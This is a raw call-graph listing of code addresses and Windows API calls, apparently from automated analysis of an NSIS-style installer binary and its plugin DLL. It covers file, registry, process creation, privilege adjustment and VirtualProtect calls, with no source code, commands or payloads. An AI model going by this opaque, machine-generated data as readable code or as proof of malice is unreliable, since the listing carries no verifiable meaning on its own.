4545->4531 4546->4528 4546->4538 4547->4538 4548->4531 4549->4516 4550->4517 4914 404267 lstrlenW 4915 404286 4914->4915 4916 404288 WideCharToMultiByte 4914->4916 4915->4916 4917 401ee9 4918 402bbf 18 API calls 4917->4918 4919 401ef0 4918->4919 4920 406398 2 API calls 4919->4920 4921 401ef6 4920->4921 4923 401f07 4921->4923 4924 405f9c wsprintfW 4921->4924 4924->4923 4925 100018a9 4926 100018cc 4925->4926 4927 100018ff GlobalFree 4926->4927 4928 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4926->4928 4927->4928 4929 10001272 2 API calls 4928->4929 4930 10001a87 GlobalFree GlobalFree 4929->4930 4931 4021ea 4932 402bbf 18 API calls 4931->4932 4933 4021f0 4932->4933 4934 402bbf 18 API calls 4933->4934 4935 4021f9 4934->4935 4936 402bbf 18 API calls 4935->4936 4937 402202 4936->4937 4938 406398 2 API calls 4937->4938 4939 40220b 4938->4939 4940 40221c lstrlenW lstrlenW 4939->4940 4941 40220f 4939->4941 4943 4051b4 25 API calls 4940->4943 4942 4051b4 25 API calls 4941->4942 4945 402217 4941->4945 4942->4945 4944 40225a SHFileOperationW 4943->4944 4944->4941 4944->4945 4946 40156b 4947 401584 4946->4947 4948 40157b ShowWindow 4946->4948 4949 401592 ShowWindow 4947->4949 4950 402a4c 4947->4950 4948->4947 4949->4950 4951 40456d 4952 4045a3 4951->4952 4953 40457d 4951->4953 4955 404180 8 API calls 4952->4955 4954 404119 19 API calls 4953->4954 4956 40458a SetDlgItemTextW 4954->4956 4957 4045af 4955->4957 4956->4952 4958 40226e 4959 402288 4958->4959 4960 402275 4958->4960 4961 406077 18 API calls 4960->4961 4962 402282 4961->4962 4963 40579a MessageBoxIndirectW 4962->4963 4963->4959 4964 402870 4986 405c2a GetFileAttributesW CreateFileW 4964->4986 4966 402877 4967 402883 GlobalAlloc 4966->4967 4968 40291a 4966->4968 4969 402911 CloseHandle 4967->4969 4970 40289c 4967->4970 4971 402922 DeleteFileW 4968->4971 4972 402935 4968->4972 4969->4968 4987 403258 SetFilePointer 4970->4987 4971->4972 4974 4028a2 4975 403242 ReadFile 4974->4975 4976 4028ab GlobalAlloc 4975->4976 4977 4028bb 4976->4977 4978 4028ef 4976->4978 4979 403027 32 API calls 4977->4979 4980 405cdc WriteFile 4978->4980 4985 4028c8 4979->4985 4981 4028fb GlobalFree 4980->4981 4982 403027 32 API calls 4981->4982 4983 40290e 4982->4983 4983->4969 4984 4028e6 GlobalFree 4984->4978 4985->4984 4986->4966 4987->4974 4988 4014f1 SetForegroundWindow 4989 402a4c 4988->4989 4990 401673 4991 402bbf 18 API calls 4990->4991 4992 40167a 4991->4992 4993 402bbf 18 API calls 4992->4993 4994 401683 4993->4994 4995 402bbf 18 API calls 4994->4995 4996 40168c MoveFileW 4995->4996 4997 40169f 4996->4997 5003 401698 4996->5003 4998 406398 2 API calls 4997->4998 5001 4021e1 4997->5001 5000 4016ae 4998->5000 4999 401423 25 API calls 4999->5001 5000->5001 5002 405ef6 38 API calls 5000->5002 5002->5003 5003->4999 5004 4052f3 5005 405314 GetDlgItem GetDlgItem GetDlgItem 5004->5005 5006 40549d 5004->5006 5049 40414e SendMessageW 5005->5049 5008 4054a6 GetDlgItem CreateThread CloseHandle 5006->5008 5009 4054ce 5006->5009 5008->5009 5011 4054f9 5009->5011 5012 4054e5 ShowWindow ShowWindow 5009->5012 5013 40551e 5009->5013 5010 405384 5015 40538b GetClientRect GetSystemMetrics SendMessageW SendMessageW 5010->5015 5014 405559 5011->5014 5017 405533 ShowWindow 5011->5017 5018 40550d 5011->5018 5051 40414e SendMessageW 5012->5051 5019 404180 8 API calls 5013->5019 5014->5013 5024 405567 SendMessageW 5014->5024 5022 4053f9 5015->5022 5023 4053dd SendMessageW SendMessageW 5015->5023 5020 405553 5017->5020 5021 405545 5017->5021 5025 4040f2 SendMessageW 5018->5025 5031 40552c 5019->5031 5027 4040f2 SendMessageW 5020->5027 5026 4051b4 25 API calls 5021->5026 5028 40540c 5022->5028 5029 4053fe SendMessageW 5022->5029 5023->5022 5030 405580 CreatePopupMenu 5024->5030 5024->5031 5025->5013 5026->5020 5027->5014 5033 404119 19 API calls 5028->5033 5029->5028 5032 406077 18 API calls 5030->5032 5034 405590 AppendMenuW 5032->5034 5035 40541c 5033->5035 5036 4055c0 TrackPopupMenu 5034->5036 5037 4055ad GetWindowRect 5034->5037 5038 405425 ShowWindow 5035->5038 5039 405459 GetDlgItem SendMessageW 5035->5039 5036->5031 5041 4055db 5036->5041 5037->5036 5042 405448 5038->5042 5043 40543b ShowWindow 5038->5043 5039->5031 5040 405480 SendMessageW SendMessageW 5039->5040 5040->5031 5044 4055f7 SendMessageW 5041->5044 5050 40414e SendMessageW 5042->5050 5043->5042 5044->5044 5045 405614 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5044->5045 5047 405639 SendMessageW 5045->5047 5047->5047 5048 405662 GlobalUnlock SetClipboardData CloseClipboard 5047->5048 5048->5031 5049->5010 5050->5039 5051->5011 5052 100016b6 5053 100016e5 5052->5053 5054 10001b18 22 API calls 5053->5054 5055 100016ec 5054->5055 5056 100016f3 5055->5056 5057 100016ff 5055->5057 5060 10001272 2 API calls 5056->5060 5058 10001726 5057->5058 5059 10001709 5057->5059 5062 10001750 5058->5062 5063 1000172c 5058->5063 5061 1000153d 3 API calls 5059->5061 5064 100016fd 5060->5064 5065 1000170e 5061->5065 5067 1000153d 3 API calls 5062->5067 5066 100015b4 3 API calls 5063->5066 5068 100015b4 3 API calls 5065->5068 5069 10001731 5066->5069 5067->5064 5070 10001714 5068->5070 5071 10001272 2 API calls 5069->5071 5072 10001272 2 API calls 5070->5072 5073 10001737 GlobalFree 5071->5073 5074 1000171a GlobalFree 5072->5074 5073->5064 5075 1000174b GlobalFree 5073->5075 5074->5064 5075->5064 5076 10002238 5077 10002296 5076->5077 5078 100022cc 5076->5078 5077->5078 5079 100022a8 GlobalAlloc 5077->5079 5079->5077 5080 401cfa GetDlgItem GetClientRect 5081 402bbf 18 API calls 5080->5081 5082 401d2c LoadImageW SendMessageW 5081->5082 5083 401d4a DeleteObject 5082->5083 5084 402a4c 5082->5084 5083->5084 4718 4027fb 4719 402bbf 18 API calls 4718->4719 4720 402802 FindFirstFileW 4719->4720 4721 40282a 4720->4721 4724 402815 4720->4724 4722 402833 4721->4722 4726 405f9c wsprintfW 4721->4726 4727 406055 lstrcpynW 4722->4727 4726->4722 4727->4724 4728 40237b 4729 402381 4728->4729 4730 402bbf 18 API calls 4729->4730 4731 402393 4730->4731 4732 402bbf 18 API calls 4731->4732 4733 40239d RegCreateKeyExW 4732->4733 4734 4023c7 4733->4734 4735 40281e 4733->4735 4736 4023e2 4734->4736 4737 402bbf 18 API calls 4734->4737 4738 4023ee 4736->4738 4740 402ba2 18 API calls 4736->4740 4739 4023d8 lstrlenW 4737->4739 4741 402409 RegSetValueExW 4738->4741 4743 403027 32 API calls 4738->4743 4739->4736 4740->4738 4742 40241f RegCloseKey 4741->4742 4742->4735 4743->4741 5085 1000103d 5086 1000101b 5 API calls 5085->5086 5087 10001056 5086->5087 5088 401dfd EnableWindow 5089 402a4c 5088->5089 5090 4014ff 5091 401507 5090->5091 5093 40151a 5090->5093 5092 402ba2 18 API calls 5091->5092 5092->5093 5094 401000 5095 401037 BeginPaint GetClientRect 5094->5095 5096 40100c DefWindowProcW 5094->5096 5097 4010f3 5095->5097 5099 401179 5096->5099 5100 401073 CreateBrushIndirect FillRect DeleteObject 5097->5100 5101 4010fc 5097->5101 5100->5097 5102 401102 CreateFontIndirectW 5101->5102 5103 401167 EndPaint 5101->5103 5102->5103 5104 401112 6 API calls 5102->5104 5103->5099 5104->5103 5105 401904 5106 40193b 5105->5106 5107 402bbf 18 API calls 5106->5107 5108 401940 5107->5108 5109 405846 69 API calls 5108->5109 5110 401949 5109->5110 5111 402d04 5112 402d16 SetTimer 5111->5112 5113 402d2f 5111->5113 5112->5113 5114 402d84 5113->5114 5115 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5113->5115 5115->5114 4500 402786 4501 40278d 4500->4501 4503 4029f7 4500->4503 4502 402ba2 18 API calls 4501->4502 4504 402798 4502->4504 4505 40279f SetFilePointer 4504->4505 4505->4503 4506 4027af 4505->4506 4508 405f9c wsprintfW 4506->4508 4508->4503 4551 100027c7 4552 10002817 4551->4552 4553 100027d7 VirtualProtect 4551->4553 4553->4552 5116 401907 5117 402bbf 18 API calls 5116->5117 5118 40190e 5117->5118 5119 40579a MessageBoxIndirectW 5118->5119 5120 401917 5119->5120 5121 401e08 5122 402bbf 18 API calls 5121->5122 5123 401e0e 5122->5123 5124 402bbf 18 API calls 5123->5124 5125 401e17 5124->5125 5126 402bbf 18 API calls 5125->5126 5127 401e20 5126->5127 5128 402bbf 18 API calls 5127->5128 5129 401e29 5128->5129 5130 401423 25 API calls 5129->5130 5131 401e30 ShellExecuteW 5130->5131 5132 401e61 5131->5132 5138 40490a 5139 404936 5138->5139 5140 40491a 5138->5140 5142 404969 5139->5142 5143 40493c SHGetPathFromIDListW 5139->5143 5149 40577e GetDlgItemTextW 5140->5149 5144 40494c 5143->5144 5148 404953 SendMessageW 5143->5148 5146 40140b 2 API calls 5144->5146 5145 404927 SendMessageW 5145->5139 5146->5148 5148->5142 5149->5145 5150 1000164f 5151 10001516 GlobalFree 5150->5151 5153 10001667 5151->5153 5152 100016ad GlobalFree 5153->5152 5154 10001682 5153->5154 5155 10001699 VirtualFree 5153->5155 5154->5152 5155->5152 4676 402095 4677 402bbf 18 API calls 4676->4677 4678 40209c 4677->4678 4679 402bbf 18 API calls 4678->4679 4680 4020a6 4679->4680 4681 402bbf 18 API calls 4680->4681 4682 4020b0 4681->4682 4683 402bbf 18 API calls 4682->4683 4684 4020ba 4683->4684 4685 402bbf 18 API calls 4684->4685 4687 4020c4 4685->4687 4686 402103 CoCreateInstance 4691 402122 4686->4691 4687->4686 4688 402bbf 18 API calls 4687->4688 4688->4686 4689 401423 25 API calls 4690 4021e1 4689->4690 4691->4689 4691->4690 5156 401a15 5157 402bbf 18 API calls 5156->5157 5158 401a1e ExpandEnvironmentStringsW 5157->5158 5159 401a32 5158->5159 5161 401a45 5158->5161 5160 401a37 lstrcmpW 5159->5160 5159->5161 5160->5161 5162 402515 5163 402bbf 18 API calls 5162->5163 5164 40251c 5163->5164 5167 405c2a GetFileAttributesW CreateFileW 5164->5167 5166 402528 5167->5166 5168 401b16 5169 402bbf 18 API calls 5168->5169 5170 401b1d 5169->5170 5171 402ba2 18 API calls 5170->5171 5172 401b26 wsprintfW 5171->5172 5173 402a4c 5172->5173 5174 10001058 5176 10001074 5174->5176 5175 100010dd 5176->5175 5177 10001516 GlobalFree 5176->5177 5178 10001092 5176->5178 5177->5178 5179 10001516 GlobalFree 5178->5179 5180 100010a2 5179->5180 5181 100010b2 5180->5181 5182 100010a9 GlobalSize 5180->5182 5183 100010b6 GlobalAlloc 5181->5183 5184 100010c7 5181->5184 5182->5181 5185 1000153d 3 API calls 5183->5185 5186 100010d2 GlobalFree 5184->5186 5185->5184 5186->5175 4745 40159b 4746 402bbf 18 API calls 4745->4746 4747 4015a2 SetFileAttributesW 4746->4747 4748 4015b4 4747->4748 4749 40229d 4750 4022a5 4749->4750 4751 4022ab 4749->4751 4752 402bbf 18 API calls 4750->4752 4753 402bbf 18 API calls 4751->4753 4754 4022b9 4751->4754 4752->4751 4753->4754 4755 4022c7 4754->4755 4757 402bbf 18 API calls 4754->4757 4756 402bbf 18 API calls 4755->4756 4758 4022d0 WritePrivateProfileStringW 4756->4758 4757->4755 5187 401f1d 5188 402bbf 18 API calls 5187->5188 5189 401f24 5188->5189 5190 40642b 5 API calls 5189->5190 5191 401f33 5190->5191 5192 401f4f GlobalAlloc 5191->5192 5197 401fb7 5191->5197 5193 401f63 5192->5193 5192->5197 5194 40642b 5 API calls 5193->5194 5195 401f6a 5194->5195 5196 40642b 5 API calls 5195->5196 5198 401f74 5196->5198 5198->5197 5202 405f9c wsprintfW 5198->5202 5200 401fa9 5203 405f9c wsprintfW 5200->5203 5202->5200 5203->5197 5204 40149e 5205 402288 5204->5205 5206 4014ac PostQuitMessage 5204->5206 5206->5205 5207 40249e 5208 402cc9 19 API calls 5207->5208 5209 4024a8 5208->5209 5210 402ba2 18 API calls 5209->5210 5211 4024b1 5210->5211 5212 40281e 5211->5212 5213 4024d5 RegEnumValueW 5211->5213 5214 4024c9 RegEnumKeyW 5211->5214 5213->5212 5215 4024ee RegCloseKey 5213->5215 5214->5215 5215->5212 5217 40231f 5218 402324 5217->5218 5219 40234f 5217->5219 5220 402cc9 19 API calls 5218->5220 5221 402bbf 18 API calls 5219->5221 5222 40232b 5220->5222 5223 402356 5221->5223 5224 402bbf 18 API calls 5222->5224 5227 40236c 5222->5227 5228 402bff RegOpenKeyExW 5223->5228 5226 40233c RegDeleteValueW RegCloseKey 5224->5226 5226->5227 5231 402c2a 5228->5231 5236 402c76 5228->5236 5229 402c50 RegEnumKeyW 5230 402c62 RegCloseKey 5229->5230 5229->5231 5233 40642b 5 API calls 5230->5233 5231->5229 5231->5230 5232 402c87 RegCloseKey 5231->5232 5234 402bff 5 API calls 5231->5234 5232->5236 5235 402c72 5233->5235 5234->5231 5235->5236 5237 402ca2 RegDeleteKeyW 5235->5237 5236->5227 5237->5236 3704 4032a0 SetErrorMode GetVersion 3705 4032d4 3704->3705 3706 4032da 3704->3706 3707 40642b 5 API calls 3705->3707 3795 4063bf GetSystemDirectoryW 3706->3795 3707->3706 3709 4032f1 3710 4063bf 3 API calls 3709->3710 3711 4032fb 3710->3711 3712 4063bf 3 API calls 3711->3712 3713 403305 3712->3713 3798 40642b GetModuleHandleA 3713->3798 3716 40642b 5 API calls 3717 403313 #17 OleInitialize SHGetFileInfoW 3716->3717 3804 406055 lstrcpynW 3717->3804 3719 403350 GetCommandLineW 3805 406055 lstrcpynW 3719->3805 3721 403362 GetModuleHandleW 3722 40337a 3721->3722 3806 405a36 3722->3806 3725 4034b4 GetTempPathW 3810 40326f 3725->3810 3727 4034cc 3728 4034d0 GetWindowsDirectoryW lstrcatW 3727->3728 3729 403526 DeleteFileW 3727->3729 3733 40326f 12 API calls 3728->3733 3820 402dee GetTickCount GetModuleFileNameW 3729->3820 3730 405a36 CharNextW 3732 4033a2 3730->3732 3732->3730 3737 40349f 3732->3737 3739 40349d 3732->3739 3735 4034ec 3733->3735 3734 40353a 3743 405a36 CharNextW 3734->3743 3777 4035dd 3734->3777 3790 4035ed 3734->3790 3735->3729 3736 4034f0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3735->3736 3738 40326f 12 API calls 3736->3738 3904 406055 lstrcpynW 3737->3904 3741 40351e 3738->3741 3739->3725 3741->3729 3741->3790 3760 403559 3743->3760 3746 403728 3748 403730 GetCurrentProcess OpenProcessToken 3746->3748 3749 4037ac ExitProcess 3746->3749 3747 403608 3928 40579a 3747->3928 3754 403748 LookupPrivilegeValueW AdjustTokenPrivileges 3748->3754 3755 40377c 3748->3755 3751 4035b7 3905 405b11 3751->3905 3752 40361e 3932 40571d 3752->3932 3754->3755 3759 40642b 5 API calls 3755->3759 3763 403783 3759->3763 3760->3751 3760->3752 3766 403798 ExitWindowsEx 3763->3766 3769 4037a5 3763->3769 3764 403634 lstrcatW 3765 40363f lstrcatW lstrcmpiW 3764->3765 3768 40365b 3765->3768 3765->3790 3766->3749 3766->3769 3771 403660 3768->3771 3772 403667 3768->3772 3970 40140b 3769->3970 3770 4035d2 3920 406055 lstrcpynW 3770->3920 3935 405683 CreateDirectoryW 3771->3935 3940 405700 CreateDirectoryW 3772->3940 3848 40389e 3777->3848 3779 40366c SetCurrentDirectoryW 3780 403687 3779->3780 3781 40367c 3779->3781 3944 406055 lstrcpynW 3780->3944 3943 406055 lstrcpynW 3781->3943 3786 4036d3 CopyFileW 3792 403695 3786->3792 3787 40371c 3788 405ef6 38 API calls 3787->3788 3788->3790 3921 4037c4 3790->3921 3791 406077 18 API calls 3791->3792 3792->3787 3792->3791 3794 403707 CloseHandle 3792->3794 3945 406077 3792->3945 3963 405ef6 MoveFileExW 3792->3963 3967 405735 CreateProcessW 3792->3967 3794->3792 3796 4063e1 wsprintfW LoadLibraryW 3795->3796 3796->3709 3799 406451 GetProcAddress 3798->3799 3800 406447 3798->3800 3802 40330c 3799->3802 3801 4063bf 3 API calls 3800->3801 3803 40644d 3801->3803 3802->3716 3803->3799 3803->3802 3804->3719 3805->3721 3807 405a3c 3806->3807 3808 403389 CharNextW 3807->3808 3809 405a43 CharNextW 3807->3809 3808->3725 3808->3732 3809->3807 3973 4062e9 3810->3973 3812 403285 3812->3727 3813 40327b 3813->3812 3982 405a09 lstrlenW CharPrevW 3813->3982 3816 405700 2 API calls 3817 403293 3816->3817 3985 405c59 3817->3985 3989 405c2a GetFileAttributesW CreateFileW 3820->3989 3822 402e2e 3847 402e3e 3822->3847 3990 406055 lstrcpynW 3822->3990 3824 402e54 3991 405a55 lstrlenW 3824->3991 3828 402e65 GetFileSize 3843 402f61 3828->3843 3846 402e7c 3828->3846 3831 402f6a 3832 402f9a GlobalAlloc 3831->3832 3831->3847 4031 403258 SetFilePointer 3831->4031 4007 403258 SetFilePointer 3832->4007 3835 402fcd 3837 402d8a 6 API calls 3835->3837 3836 402fb5 4008 403027 3836->4008 3837->3847 3838 402f83 3840 403242 ReadFile 3838->3840 3842 402f8e 3840->3842 3841 402d8a 6 API calls 3841->3846 3842->3832 3842->3847 3996 402d8a 3843->3996 3844 402fc1 3844->3844 3845 402ffe SetFilePointer 3844->3845 3844->3847 3845->3847 3846->3835 3846->3841 3846->3843 3846->3847 4028 403242 3846->4028 3847->3734 3849 40642b 5 API calls 3848->3849 3850 4038b2 3849->3850 3851 4038b8 GetUserDefaultUILanguage 3850->3851 3852 4038ca 3850->3852 4052 405f9c wsprintfW 3851->4052 4062 405f22 RegOpenKeyExW 3852->4062 3855 4038c8 4053 403b74 3855->4053 3857 403919 lstrcatW 3857->3855 3859 405f22 3 API calls 3859->3857 3861 405b11 18 API calls 3862 40394b 3861->3862 3863 4039df 3862->3863 3865 405f22 3 API calls 3862->3865 3864 405b11 18 API calls 3863->3864 3866 4039e5 3864->3866 3867 40397d 3865->3867 3868 4039f5 LoadImageW 3866->3868 3869 406077 18 API calls 3866->3869 3867->3863 3872 40399e lstrlenW 3867->3872 3876 405a36 CharNextW 3867->3876 3870 403a9b 3868->3870 3871 403a1c RegisterClassW 3868->3871 3869->3868 3874 40140b 2 API calls 3870->3874 3873 403a52 SystemParametersInfoW CreateWindowExW 3871->3873 3903 403aa5 3871->3903 3877 4039d2 3872->3877 3878 4039ac lstrcmpiW 3872->3878 3873->3870 3875 403aa1 3874->3875 3882 403b74 19 API calls 3875->3882 3875->3903 3880 40399b 3876->3880 3879 405a09 3 API calls 3877->3879 3878->3877 3881 4039bc GetFileAttributesW 3878->3881 3883 4039d8 3879->3883 3880->3872 3884 4039c8 3881->3884 3886 403ab2 3882->3886 4067 406055 lstrcpynW 3883->4067 3884->3877 3885 405a55 2 API calls 3884->3885 3885->3877 3888 403b41 3886->3888 3889 403abe ShowWindow 3886->3889 4068 405287 OleInitialize 3888->4068 3891 4063bf 3 API calls 3889->3891 3893 403ad6 3891->3893 3892 403b47 3894 403b63 3892->3894 3895 403b4b 3892->3895 3896 403ae4 GetClassInfoW 3893->3896 3898 4063bf 3 API calls 3893->3898 3897 40140b 2 API calls 3894->3897 3901 40140b 2 API calls 3895->3901 3895->3903 3899 403af8 GetClassInfoW RegisterClassW 3896->3899 3900 403b0e DialogBoxParamW 3896->3900 3897->3903 3898->3896 3899->3900 3902 40140b 2 API calls 3900->3902 3901->3903 3902->3903 3903->3790 3904->3739 4083 406055 lstrcpynW 3905->4083 3907 405b22 4084 405ab4 CharNextW CharNextW 3907->4084 3910 4035c3 3910->3790 3919 406055 lstrcpynW 3910->3919 3911 4062e9 5 API calls 3917 405b38 3911->3917 3912 405b69 lstrlenW 3913 405b74 3912->3913 3912->3917 3915 405a09 3 API calls 3913->3915 3916 405b79 GetFileAttributesW 3915->3916 3916->3910 3917->3910 3917->3912 3918 405a55 2 API calls 3917->3918 4090 406398 FindFirstFileW 3917->4090 3918->3912 3919->3770 3920->3777 3922 4037dc 3921->3922 3923 4037ce CloseHandle 3921->3923 4093 403809 3922->4093 3923->3922 3930 4057af 3928->3930 3929 4057c3 MessageBoxIndirectW 3931 403616 ExitProcess 3929->3931 3930->3929 3930->3931 3933 40642b 5 API calls 3932->3933 3934 403623 lstrcatW 3933->3934 3934->3764 3934->3765 3936 403665 3935->3936 3937 4056d4 GetLastError 3935->3937 3936->3779 3937->3936 3938 4056e3 SetFileSecurityW 3937->3938 3938->3936 3939 4056f9 GetLastError 3938->3939 3939->3936 3941 405710 3940->3941 3942 405714 GetLastError 3940->3942 3941->3779 3942->3941 3943->3780 3944->3792 3960 406084 3945->3960 3946 4062cf 3947 4036c6 DeleteFileW 3946->3947 4152 406055 lstrcpynW 3946->4152 3947->3786 3947->3792 3949 406137 GetVersion 3949->3960 3950 40629d lstrlenW 3950->3960 3951 406077 10 API calls 3951->3950 3954 4061b2 GetSystemDirectoryW 3954->3960 3955 405f22 3 API calls 3955->3960 3956 4061c5 GetWindowsDirectoryW 3956->3960 3957 4062e9 5 API calls 3957->3960 3958 406077 10 API calls 3958->3960 3959 40623e lstrcatW 3959->3960 3960->3946 3960->3949 3960->3950 3960->3951 3960->3954 3960->3955 3960->3956 3960->3957 3960->3958 3960->3959 3961 4061f9 SHGetSpecialFolderLocation 3960->3961 4150 405f9c wsprintfW 3960->4150 4151 406055 lstrcpynW 3960->4151 3961->3960 3962 406211 SHGetPathFromIDListW CoTaskMemFree 3961->3962 3962->3960 3964 405f17 3963->3964 3965 405f0a 3963->3965 3964->3792 4153 405d84 lstrcpyW 3965->4153 3968 405774 3967->3968 3969 405768 CloseHandle 3967->3969 3968->3792 3969->3968 3971 401389 2 API calls 3970->3971 3972 401420 3971->3972 3972->3749 3980 4062f6 3973->3980 3974 40636c 3975 406371 CharPrevW 3974->3975 3977 406392 3974->3977 3975->3974 3976 40635f CharNextW 3976->3974 3976->3980 3977->3813 3978 405a36 CharNextW 3978->3980 3979 40634b CharNextW 3979->3980 3980->3974 3980->3976 3980->3978 3980->3979 3981 40635a CharNextW 3980->3981 3981->3976 3983 40328d 3982->3983 3984 405a25 lstrcatW 3982->3984 3983->3816 3984->3983 3986 405c66 GetTickCount GetTempFileNameW 3985->3986 3987 40329e 3986->3987 3988 405c9c 3986->3988 3987->3727 3988->3986 3988->3987 3989->3822 3990->3824 3992 405a63 3991->3992 3993 402e5a 3992->3993 3994 405a69 CharPrevW 3992->3994 3995 406055 lstrcpynW 3993->3995 3994->3992 3994->3993 3995->3828 3997 402d93 3996->3997 3998 402dab 3996->3998 3999 402da3 3997->3999 4000 402d9c DestroyWindow 3997->4000 4001 402db3 3998->4001 4002 402dbb GetTickCount 3998->4002 3999->3831 4000->3999 4032 406467 4001->4032 4004 402dc9 CreateDialogParamW ShowWindow 4002->4004 4005 402dec 4002->4005 4004->4005 4005->3831 4007->3836 4009 403040 4008->4009 4010 40306e 4009->4010 4038 403258 SetFilePointer 4009->4038 4012 403242 ReadFile 4010->4012 4013 403079 4012->4013 4014 4031db 4013->4014 4015 40308b GetTickCount 4013->4015 4023 4031c5 4013->4023 4016 40321d 4014->4016 4017 4031df 4014->4017 4015->4023 4027 4030da 4015->4027 4019 403242 ReadFile 4016->4019 4020 403242 ReadFile 4017->4020 4021 405cdc WriteFile 4017->4021 4017->4023 4018 403242 ReadFile 4018->4027 4019->4023 4020->4017 4021->4017 4022 403130 GetTickCount 4022->4027 4023->3844 4024 403155 MulDiv wsprintfW 4039 4051b4 4024->4039 4027->4018 4027->4022 4027->4023 4027->4024 4036 405cdc WriteFile 4027->4036 4050 405cad ReadFile 4028->4050 4031->3838 4033 406484 PeekMessageW 4032->4033 4034 402db9 4033->4034 4035 40647a DispatchMessageW 4033->4035 4034->3831 4035->4033 4037 405cfa 4036->4037 4037->4027 4038->4010 4040 4051cf 4039->4040 4048 405271 4039->4048 4041 4051eb lstrlenW 4040->4041 4044 406077 18 API calls 4040->4044 4042 405214 4041->4042 4043 4051f9 lstrlenW 4041->4043 4046 405227 4042->4046 4047 40521a SetWindowTextW 4042->4047 4045 40520b lstrcatW 4043->4045 4043->4048 4044->4041 4045->4042 4046->4048 4049 40522d SendMessageW SendMessageW SendMessageW 4046->4049 4047->4046 4048->4027 4049->4048 4051 403255 4050->4051 4051->3846 4052->3855 4054 403b88 4053->4054 4075 405f9c wsprintfW 4054->4075 4056 403bf9 4057 406077 18 API calls 4056->4057 4058 403c05 SetWindowTextW 4057->4058 4059 403929 4058->4059 4060 403c21 4058->4060 4059->3861 4060->4059 4061 406077 18 API calls 4060->4061 4061->4060 4063 4038fa 4062->4063 4064 405f56 RegQueryValueExW 4062->4064 4063->3857 4063->3859 4065 405f77 RegCloseKey 4064->4065 4065->4063 4067->3863 4076 404165 4068->4076 4070 4052d1 4071 404165 SendMessageW 4070->4071 4072 4052e3 OleUninitialize 4071->4072 4072->3892 4073 4052aa 4073->4070 4079 401389 4073->4079 4075->4056 4077 40417d 4076->4077 4078 40416e SendMessageW 4076->4078 4077->4073 4078->4077 4081 401390 4079->4081 4080 4013fe 4080->4073 4081->4080 4082 4013cb MulDiv SendMessageW 4081->4082 4082->4081 4083->3907 4085 405ad1 4084->4085 4088 405ae3 4084->4088 4087 405ade CharNextW 4085->4087 4085->4088 4086 405b07 4086->3910 4086->3911 4087->4086 4088->4086 4089 405a36 CharNextW 4088->4089 4089->4088 4091 4063b9 4090->4091 4092 4063ae FindClose 4090->4092 4091->3917 4092->4091 4094 403817 4093->4094 4095 4037e1 4094->4095 4096 40381c FreeLibrary GlobalFree 4094->4096 4097 405846 4095->4097 4096->4095 4096->4096 4098 405b11 18 API calls 4097->4098 4099 405866 4098->4099 4100 405885 4099->4100 4101 40586e DeleteFileW 4099->4101 4103 4059b0 4100->4103 4137 406055 lstrcpynW 4100->4137 4102 4035f6 OleUninitialize 4101->4102 4102->3746 4102->3747 4103->4102 4110 406398 2 API calls 4103->4110 4105 4058ab 4106 4058b1 lstrcatW 4105->4106 4107 4058be 4105->4107 4108 4058c4 4106->4108 4109 405a55 2 API calls 4107->4109 4111 4058d4 lstrcatW 4108->4111 4112 4058ca 4108->4112 4109->4108 4113 4059ca 4110->4113 4115 4058df lstrlenW FindFirstFileW 4111->4115 4112->4111 4112->4115 4113->4102 4114 4059ce 4113->4114 4116 405a09 3 API calls 4114->4116 4117 4059a5 4115->4117 4135 405901 4115->4135 4118 4059d4 4116->4118 4117->4103 4120 4057fe 5 API calls 4118->4120 4119 405988 FindNextFileW 4123 40599e FindClose 4119->4123 4119->4135 4122 4059e0 4120->4122 4124 4059e4 4122->4124 4125 4059fa 4122->4125 4123->4117 4124->4102 4128 4051b4 25 API calls 4124->4128 4127 4051b4 25 API calls 4125->4127 4127->4102 4130 4059f1 4128->4130 4129 405846 62 API calls 4129->4135 4132 405ef6 38 API calls 4130->4132 4131 4051b4 25 API calls 4131->4119 4133 4059f8 4132->4133 4133->4102 4134 4051b4 25 API calls 4134->4135 4135->4119 4135->4129 4135->4131 4135->4134 4136 405ef6 38 API calls 4135->4136 4138 406055 lstrcpynW 4135->4138 4139 4057fe 4135->4139 4136->4135 4137->4105 4138->4135 4147 405c05 GetFileAttributesW 4139->4147 4142 40582b 4142->4135 4143 405821 DeleteFileW 4145 405827 4143->4145 4144 405819 RemoveDirectoryW 4144->4145 4145->4142 4146 405837 SetFileAttributesW 4145->4146 4146->4142 4148 40580a 4147->4148 4149 405c17 SetFileAttributesW 4147->4149 4148->4142 4148->4143 4148->4144 4149->4148 4150->3960 4151->3960 4152->3947 4154 405dd2 GetShortPathNameW 4153->4154 4155 405dac 4153->4155 4157 405ef1 4154->4157 4158 405de7 4154->4158 4180 405c2a GetFileAttributesW CreateFileW 4155->4180 4157->3964 4158->4157 4160 405def wsprintfA 4158->4160 4159 405db6 CloseHandle GetShortPathNameW 4159->4157 4161 405dca 4159->4161 4162 406077 18 API calls 4160->4162 4161->4154 4161->4157 4163 405e17 4162->4163 4181 405c2a GetFileAttributesW CreateFileW 4163->4181 4165 405e24 4165->4157 4166 405e33 GetFileSize GlobalAlloc 4165->4166 4167 405e55 4166->4167 4168 405eea CloseHandle 4166->4168 4169 405cad ReadFile 4167->4169 4168->4157 4170 405e5d 4169->4170 4170->4168 4182 405b8f lstrlenA 4170->4182 4173 405e74 lstrcpyA 4175 405e96 4173->4175 4174 405e88 4176 405b8f 4 API calls 4174->4176 4177 405ecd SetFilePointer 4175->4177 4176->4175 4178 405cdc WriteFile 4177->4178 4179 405ee3 GlobalFree 4178->4179 4179->4168 4180->4159 4181->4165 4183 405bd0 lstrlenA 4182->4183 4184 405bd8 4183->4184 4185 405ba9 lstrcmpiA 4183->4185 4184->4173 4184->4174 4185->4184 4186 405bc7 CharNextA 4185->4186 4186->4183 5238 100010e1 5247 10001111 5238->5247 5239 100011d8 GlobalFree 5240 100012ba 2 API calls 5240->5247 5241 100011d3 5241->5239 5242 100011f8 GlobalFree 5242->5247 5243 10001272 2 API calls 5246 100011c4 GlobalFree 5243->5246 5244 10001164 GlobalAlloc 5244->5247 5245 100012e1 lstrcpyW 5245->5247 5246->5247 5247->5239 5247->5240 5247->5241 5247->5242 5247->5243 5247->5244 5247->5245 5247->5246 5248 401ca3 5249 402ba2 18 API calls 5248->5249 5250 401ca9 IsWindow 5249->5250 5251 401a05 5250->5251 5252 402a27 